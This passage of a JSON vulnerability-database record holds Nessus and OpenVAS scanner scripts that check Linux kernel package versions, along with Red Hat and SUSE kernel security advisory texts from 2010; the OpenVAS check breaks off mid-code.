OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates : please see Oracle VM Security Advisory\nOVMSA-2013-0039 for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2013-May/000153.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel Sendpage Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 119, 189, 200, 264, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-ovs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! ereg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-PAE-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-PAE-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-ovs-2.6.18-128.2.1.5.10.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"kernel-ovs-devel-2.6.18-128.2.1.5.10.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-devel / kernel-ovs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-05-29T14:34:40", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a deficiency was found in the fasync_helper() implementation. This could\nallow a local, unprivileged user to leverage a use-after-free of locked,\nasynchronous file descriptors to cause a denial of service or privilege\nescalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb() function\nin the Linux kernel Stream Control Transmission Protocol (SCTP)\nimplementation. A remote attacker could send a specially-crafted SCTP\npacket to a target system, resulting in a denial of service.\n(CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail()\nfunction in the Linux kernel. An attacker on the local network could\ntrigger this flaw by sending IPv6 traffic to a target system, leading to a\nsystem crash (kernel OOPS) if dst->neighbour is NULL on the target system\nwhen receiving an IPv6 packet. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs:\n\n* programs compiled on x86, and that also call sched_rr_get_interval(),\nwere silently corrupted when run on 64-bit systems. With this update, when\nsuch programs attempt to call sched_rr_get_interval() on 64-bit systems,\nsys32_sched_rr_get_interval() is called instead, which resolves this issue.\n(BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a\nregression, preventing Wake on LAN (WoL) working for network devices using\nthe Intel PRO/1000 Linux driver, e1000e. Attempting to configure WoL for\nsuch devices resulted in the following error, even when configuring valid\noptions:\n\n\"Cannot set new wake-on-lan settings: Operation not supported\nnot setting wol\"\n\nThis update resolves this regression, and WoL now works as expected for\nnetwork devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel 64\nand AMD64 systems, one of which could have possibly led to data corruption.\n(BZ#568307)\n\n* on some systems, a race condition in the inode-based file event\nnotifications implementation caused soft lockups and the following\nmessages:\n\n\"BUG: warning at fs/inotify.c:181/set_dentry_child_flags()\"\n\"BUG: soft lockup - CPU#[x] stuck for 10s!\"\n\nThis update resolves this race condition, and also removes the inotify\ndebugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-07-28T18:59:54", "published": "2010-03-16T04:00:00", "id": "RHSA-2010:0149", "href": "https://access.redhat.com/errata/RHSA-2010:0149", "type": "redhat", "title": "(RHSA-2010:0149) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:38", "bulletinFamily": "unix", "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a deficiency was found in the fasync_helper() implementation. This could\nallow a local, unprivileged user to leverage a use-after-free of locked,\nasynchronous file descriptors to cause a denial of service or privilege\nescalation. (CVE-2009-4141, Important)\n\n* multiple flaws were found in the mmap and mremap implementations. A\nlocal, unprivileged user could use these flaws to cause a local denial of\nservice or escalate their privileges. (CVE-2010-0291, Important)\n\n* a missing boundary check was found in the do_move_pages() function in the\nmemory migration functionality. A local user could use this flaw to cause a\nlocal denial of service or an information leak. (CVE-2010-0415, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail()\nfunction. An attacker on the local network could trigger this flaw by\nsending IPv6 traffic to a target system, leading to a system crash (kernel\nOOPS) if dst->neighbour is NULL on the target system when receiving an IPv6\npacket. (CVE-2010-0437, Important)\n\n* a NULL pointer dereference flaw was found in the Fast Userspace Mutexes\n(futexes) implementation. The unlock code path did not check if the futex\nvalue associated with pi_state->owner had been modified. A local user could\nuse this flaw to modify the futex value, possibly leading to a denial of\nservice or privilege escalation when the pi_state->owner pointer is\ndereferenced. (CVE-2010-0622, Important)\n\n* an information leak was found in the print_fatal_signal() implementation.\nWhen \"/proc/sys/kernel/print-fatal-signals\" is set to 1 (the default value\nis 0), memory that is reachable by the kernel could be leaked to\nuser-space. This issue could also result in a system crash. Note that this\nflaw only affected the i386 architecture. (CVE-2010-0003, Moderate)\n\n* a flaw was found in the kernel connector implementation. A local,\nunprivileged user could trigger this flaw by sending an arbitrary amount of\nnotification requests using specially-crafted netlink messages, resulting\nin a denial of service. (CVE-2010-0410, Moderate)\n\n* missing capability checks were found in the ebtables implementation, used\nfor creating an Ethernet bridge firewall. This could allow a local,\nunprivileged user to bypass intended capability restrictions and modify\nebtables rules. (CVE-2010-0007, Low)\n\nThis update also fixes the following bugs:\n\n* references were missing for two LSI MegaRAID SAS controllers already\nsupported by the kernel, preventing systems using these controllers from\nbooting. (BZ#554664)\n\n* a typo in the fix for CVE-2009-2691 resulted in gdb being unable to read\ncore files created by gcore. (BZ#554965) \n\n* values for certain pointers used by the kernel, which should be\nundereferencable, could potentially be abused when a kernel OOPS occurs.\nValues that are harder to dereference are now used. (BZ#555227)\n\n* this update redesigns the locking scheme of the TTY process group\n(tty->pgrp) structure, due to race conditions introduced when tty->pgrp\nstarted using struct pid instead of pid_t. (BZ#559101)\n\n* the way the NFS kernel server used iget() and the way in which it kept\nits cache of inode information, could have led to (mainly on busy file\nservers) inconsistencies between the local file system and the file system\nbeing served to clients. (BZ#561275)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2019-03-22T23:44:41", "published": "2010-03-23T04:00:00", "id": "RHSA-2010:0161", "href": "https://access.redhat.com/errata/RHSA-2010:0161", "type": "redhat", "title": "(RHSA-2010:0161) Important: kernel-rt security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes:\n\n* an array index error was found in the gdth driver. A local user could\nsend a specially-crafted IOCTL request that would cause a denial of service\nor, possibly, privilege escalation. (CVE-2009-3080, Important)\n\n* a flaw was found in the FUSE implementation. When a system is low on\nmemory, fuse_put_request() could dereference an invalid pointer, possibly\nleading to a local denial of service or privilege escalation.\n(CVE-2009-4021, Important)\n\n* Tavis Ormandy discovered a deficiency in the fasync_helper()\nimplementation. This could allow a local, unprivileged user to leverage a\nuse-after-free of locked, asynchronous file descriptors to cause a denial\nof service or privilege escalation. (CVE-2009-4141, Important)\n\n* the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\nupdate introduced two flaws in the routing implementation. If an attacker\nwas able to cause a large enough number of collisions in the routing hash\ntable (via specially-crafted packets) for the emergency route flush to\ntrigger, a deadlock could occur. Secondly, if the kernel routing cache was\ndisabled, an uninitialized pointer would be left behind after a route\nlookup, leading to a kernel panic. (CVE-2009-4272, Important)\n\n* the RHSA-2009:0225 update introduced a rewrite attack flaw in the\ndo_coredump() function. A local attacker able to guess the file name a\nprocess is going to dump its core to, prior to the process crashing, could\nuse this flaw to append data to the dumped core file. This issue only\naffects systems that have \"/proc/sys/fs/suid_dumpable\" set to 2 (the\ndefault value is 0). (CVE-2006-6304, Moderate)\n\nThe fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\nset to 2, the core file will not be recorded if the file already exists.\nFor example, core files will not be overwritten on subsequent crashes of\nprocesses whose core files map to the same name.\n\n* an information leak was found in the Linux kernel. On AMD64 systems,\n32-bit processes could access and read certain 64-bit registers by\ntemporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n\n* the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\nsupport in the qla2xxx driver, resulting in two new sysfs pseudo files,\n\"/sys/class/scsi_host/[a qla2xxx host]/vport_create\" and \"vport_delete\".\nThese two files were world-writable by default, allowing a local user to\nchange SCSI host attributes. This flaw only affects systems using the\nqla2xxx driver and NPIV capable hardware. (CVE-2009-3556, Moderate)\n\n* permission issues were found in the megaraid_sas driver. The \"dbg_lvl\"\nand \"poll_mode_io\" files on the sysfs file system (\"/sys/\") had\nworld-writable permissions. This could allow local, unprivileged users to\nchange the behavior of the driver. (CVE-2009-3889, CVE-2009-3939, Moderate)\n\n* a NULL pointer dereference flaw was found in the firewire-ohci driver\nused for OHCI compliant IEEE 1394 controllers. A local, unprivileged user\nwith access to /dev/fw* files could issue certain IOCTL calls, causing a\ndenial of service or privilege escalation. The FireWire modules are\nblacklisted by default, and if enabled, only root has access to the files\nnoted above by default. (CVE-2009-4138, Moderate)\n\n* a buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS file system implementation. This could lead to a denial of service if a\nuser browsed a specially-crafted HFS file system, for example, by running\n\"ls\". (CVE-2009-4020, Low)\n\nBug fix documentation for this update will be available shortly from\nwww.redhat.com/docs/en-US/errata/RHSA-2010-0046/Kernel_Security_Update/\nindex.html\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-09-08T12:08:34", "published": "2010-01-19T05:00:00", "id": "RHSA-2010:0046", "href": "https://access.redhat.com/errata/RHSA-2010:0046", "type": "redhat", "title": "(RHSA-2010:0046) Important: kernel security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T14:34:04", "bulletinFamily": "unix", "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\n(RHEV) Hypervisor ISO disk image. The RHEV Hypervisor is a dedicated\nKernel-based Virtual Machine (KVM) hypervisor. It includes everything\nnecessary to run and manage virtual machines: A subset of the Red Hat\nEnterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: RHEV Hypervisor is only available for the Intel 64 and AMD64\narchitectures with virtualization extensions.\n\nA flaw was found in the IPv6 Extension Header (EH) handling\nimplementation in the Linux kernel. The skb->dst data structure was not\nproperly validated in the ipv6_hop_jumbo() function. This could possibly\nlead to a remote denial of service. (CVE-2007-4567)\n\nThe Parallels Virtuozzo Containers team reported two flaws in the routing\nimplementation. If an attacker was able to cause a large enough number of\ncollisions in the routing hash table (via specially-crafted packets) for\nthe emergency route flush to trigger, a deadlock could occur. Secondly, if\nthe kernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272)\n\nA flaw was found in each of the following Intel PRO/1000 Linux drivers in\nthe Linux kernel: e1000 and e1000e. A remote attacker using packets larger\nthan the MTU could bypass the existing fragment check, resulting in\npartial, invalid frames being passed to the network stack. These flaws\ncould also possibly be used to trigger a remote denial of service.\n(CVE-2009-4536, CVE-2009-4538)\n\nA flaw was found in the Realtek r8169 Ethernet driver in the Linux kernel.\nReceiving overly-long frames with a certain revision of the network cards\nsupported by this driver could possibly result in a remote denial of\nservice. (CVE-2009-4537)\n\nThe x86 emulator implementation was missing a check for the Current\nPrivilege Level (CPL) and I/O Privilege Level (IOPL). A user in a guest\ncould leverage these flaws to cause a denial of service (guest crash) or\npossibly escalate their privileges within that guest. (CVE-2010-0298,\nCVE-2010-0306)\n\nA flaw was found in the Programmable Interval Timer (PIT) emulation. Access\nto the internal data structure pit_state, which represents the data state\nof the emulated PIT, was not properly validated in the pit_ioport_read()\nfunction. A privileged guest user could use this flaw to crash the host.\n(CVE-2010-0309)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for RHEV\nHypervisor. These fixes are for kernel issues CVE-2006-6304, CVE-2009-2910,\nCVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\nCVE-2009-4021, CVE-2009-4138, and CVE-2009-4141; ntp issue CVE-2009-3563;\ndbus issue CVE-2009-1189; dnsmasq issues CVE-2009-2957 and CVE-2009-2958;\ngnutls issue CVE-2009-2730; krb5 issue CVE-2009-4212; bind issue \nCVE-2010-0097; gzip issue CVE-2010-0001; openssl issues CVE-2009-2409 and \nCVE-2009-4355; and gcc issue CVE-2009-3736.\n\nThis update also fixes the following bugs:\n\n* on systems with a large number of disk devices, USB storage devices may\nget enumerated after \"/dev/sdz\", for example, \"/dev/sdcd\". This was not\nhandled by the udev rules, resulting in a missing \"/dev/live\" symbolic\nlink, causing installations from USB media to fail. With this update, udev\nrules correctly handle USB storage devices on systems with a large number\nof disk devices, which resolves this issue. (BZ#555083)\n\nAs RHEV Hypervisor is based on KVM, the bug fixes from the KVM update\nRHSA-2010:0088 have been included in this update:\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0088.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.", "modified": "2019-03-22T23:44:58", "published": "2010-02-09T05:00:00", "id": "RHSA-2010:0095", "href": "https://access.redhat.com/errata/RHSA-2010:0095", "type": "redhat", "title": "(RHSA-2010:0095) Important: rhev-hypervisor security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:23:43", "bulletinFamily": "unix", "description": "This update of the openSUSE 11.2 kernel brings the kernel to version 2.6.31.12 and contains a lot of bug and security fixes.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2010-02-08T17:19:31", "published": "2010-02-08T17:19:31", "id": "SUSE-SA:2010:010", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html", "title": "remote denial of service in kernel", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-01-02T10:54:54", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-12-26T00:00:00", "published": "2010-02-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850124", "id": "OPENVAS:1361412562310850124", "title": "SuSE Update for kernel SUSE-SA:2010:010", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for kernel SUSE-SA:2010:010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This update of the openSUSE 11.2 kernel brings the kernel to version\n 2.6.31.12 and contains a lot of bug and security fixes.\n\n CVE-2010-0299: The permission of the devtmpfs root directory\n was incorrectly 1777 (instead of 755). If it was used, local\n attackers could escalate privileges.\n (openSUSE 11.2 does not use this filesystem by default).\n\n CVE-2009-3939: The poll_mode_io file for the megaraid_sas driver in\n the Linux kernel 2.6.31.6 and earlier has world-writable permissions,\n which allows local users to change the I/O mode of the driver by\n modifying this file.\n\n CVE-2010-0007: ebtables was lacking a CAP_NET_ADMIN check, making\n it possible for local unprivileged attackers to modify the network\n bridge management.\n\n CVE-2010-0003: An information leakage on fatal signals on x86_64\n machines was fixed.\n\n CVE-2009-4141: A race condition in fasync handling could be used by\n local attackers to crash the machine or potentially execute code.\n\n CVE-2010-0006: The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in\n the Linux kernel before 2.6.32.4, when network namespaces are enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference) via an invalid IPv6 jumbogram.\n\n CVE-2009-4536: drivers/net/e1000/e1000_main.c in the e1000 driver in\n the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that\n exceed the MTU by processing certain trailing payload data as if it\n were a complete frame, which allows remote attackers to bypass packet\n filters via a large packet with a crafted payload.\n\n CVE-2009-4538: drivers/net/e1000e/netdev.c in the e1000e driver in\n the Linux kernel 2.6.32.3 and earlier does not properly check the\n size of an Ethernet frame that exceeds the MTU, which allows remote\n attackers to have an unspecified impact via crafted packets.\";\n\ntag_impact = \"remote denial of service\";\ntag_affected = \"kernel on openSUSE 11.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850124\");\n script_version(\"$Revision: 8246 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 08:29:20 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-19 13:38:15 +0100 (Fri, 19 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-010\");\n script_cve_id(\"CVE-2009-3939\", \"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0299\");\n script_name(\"SuSE Update for kernel SUSE-SA:2010:010\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~2.6.31.12~0.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n 